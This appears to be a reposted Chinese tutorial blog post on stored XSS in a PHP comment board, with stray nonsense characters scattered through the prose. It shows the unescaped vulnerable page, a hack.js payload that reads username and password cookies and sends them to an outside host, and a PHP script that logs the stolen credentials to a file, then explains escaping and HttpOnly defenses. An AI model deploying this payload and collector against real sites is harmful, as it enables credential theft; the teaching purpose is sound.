XSS為目前web常見攻擊手段之一民鼓，不了解的同學(xué)可以看我的上一篇文章《常見WEB攻擊之XSS攻擊》

下面我演示一個簡單的留言板攻擊實例

我們有個頁面用于允許用戶發(fā)表留言窃肠，然后在頁面底部顯示留言列表
前端代碼如下：

<!DOCTYPE html><html><head>
    <?php include('/components/headerinclude.php');?></head>
    <style type="text/css">
        .comment-title{
            font-size:14px;
            margin: 6px 0px 2px 4px;
        }

        .comment-body{
            font-size: 14px;
            color:#ccc;
            font-style: italic;
            border-bottom: dashed 1px #ccc;
            margin: 4px;
        }
    </style>
    <script type="text/javascript" src="/js/cookies.js"></script><body>
    <form method="post" action="list.php">
        <div style="margin:20px;">
            <div style="font-size:16px;font-weight:bold;">Your Comment</div>
            <div style="padding:6px;">
                Nick Name:                <br/>
                <input name="name" type="text" style="width:300px;"/>
            </div>
            <div style="padding:6px;">
                Comment:                <br/>
                <textarea name="comment" style="height:100px; width:300px;"></textarea>
            </div>
            <div style="padding-left:230px;">
                <input type="submit" value="POST" style="padding:4px 0px; width:80px;"/>
            </div>
            <div style="border-bottom:solid 1px #fff;margin-top:10px;">
                <div style="font-size:16px;font-weight:bold;">Comments</div>
            </div>
            <?php 
                require('/components/comments.php'); 
                if(!empty($_POST['name'])){
                    addElement($_POST['name'],$_POST['comment']);
                }
                renderComments();            ?>
        </div>
    </form></body></html>

addElement()方法用于添加新的留言包个，而renderComments()方法用于展留言列表，網(wǎng)頁看起來是這樣的

02105935_5hbx.png

XSS攻擊

因為我們完全信任了用戶輸入冤留，但有些別有用心的用戶會像這樣的輸入

02105935_jLwV.png

這樣無論是誰訪問這個頁面的時候控制臺都會輸出“Hey you are a fool fish!”碧囊，如果這只是個惡意的小玩笑，有些人做的事情就不可愛了纤怒，有些用戶會利用這個漏洞竊取用戶信息糯而、誘騙人打開惡意網(wǎng)站或者下載惡意程序等，看個最簡單的例子

利用xss竊取用戶名密碼

當(dāng)然這個示例很簡單泊窘，幾乎攻擊不到任何網(wǎng)站熄驼，僅僅看看其原理。我們知道很多登陸界面都有記住用戶名烘豹、密碼的功能方便用戶下次登錄瓜贾，有些網(wǎng)站是直接用明文記錄用戶名、密碼携悯，惡意用戶注冊賬戶登錄后使用簡單工具查看cookie結(jié)構(gòu)名稱后祭芦，如果網(wǎng)站有xss漏洞，那么簡單的利用jsonp就可以獲取其它用戶的用戶名憔鬼、密碼了龟劲。

惡意用戶會這么輸入

02105935_6Ad3.png

我們看看 http://test.com/hack.js 里藏了什么

var username=CookieHelper.getCookie('username').value;
var password=CookieHelper.getCookie('password').value;
var script =document.createElement('script');
script.src='http://test.com/index.php?username='+username+'&password='+password;
document.body.appendChild(script);

幾句簡單的javascript，獲取cookie中的用戶名密碼轴或，利用jsonp把向 http://test.com/index.php

發(fā)送了一個get請求
http://test.com/index.php

<?php    
if(!empty($_GET['password'])){        
$username=$_GET['username'];        
$password=$_GET['password'];        
      try{           
         $path=$_SERVER["DOCUMENT_ROOT"].'/password.txt';            
         $fp=fopen($path,'a');            
         flock($fp, LOCK_EX);            
         fwrite($fp, "$username\t $password\r\n");           
         flock($fp, LOCK_UN);            
         fclose($fp);
     }catch(Exception $e){
                      ........
      }
 ?>

上面演示的是一個非常簡單的XSS攻擊昌跌，還有很多隱蔽的方式，但是其核心都是利用了腳本注入照雁。
因此我們解決辦法其實很簡單：不信賴用戶輸入蚕愤，對特殊字符如”<”,”>”轉(zhuǎn)義，就可以從根本上防止這一問題饺蚊。使用htmlspecialchars函數(shù)將特殊字符轉(zhuǎn)換成HTML編碼萍诱。

XSS攻擊可以進(jìn)行session劫持：Hack通過腳本注入到應(yīng)用服務(wù)器，待其他真實用戶A登錄訪問含有XSS腳本的網(wǎng)頁卸勺，腳本激活，將客戶的session信息發(fā)送給Hack烫扼，Hack就使用該session直接扮演用戶A訪問服務(wù)器曙求。這種session劫持主要靠XSS漏洞和客戶端獲取sessionId完成，防范分兩步：
1、過濾用戶輸入悟狱，防止XSS漏洞
2.静浴、設(shè)置sessionId的cookie為HttpOnly，使客戶端無法獲取